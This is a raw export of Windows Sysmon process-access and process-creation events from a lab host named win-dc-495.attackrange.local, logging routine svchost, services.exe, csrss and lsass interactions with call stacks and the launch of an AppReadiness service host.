13:58:19.274{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.274{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+b71e|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000010330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.227{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+b680|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000010329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.227{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.227{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.211{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.164{59A5CD1D-8E44-6005-0A00-00000000A301}8485104C:\Windows\system32\services.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.164{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.164{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.164{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.164{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.164{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.164{59A5CD1D-8E44-6005-0A00-00000000A301}8482664C:\Windows\system32\services.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000010318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.169{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k AppReadinessC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x800000000000000010317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.164{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.164{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.164{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.164{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.086{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.086{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.696{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.602{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.602{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 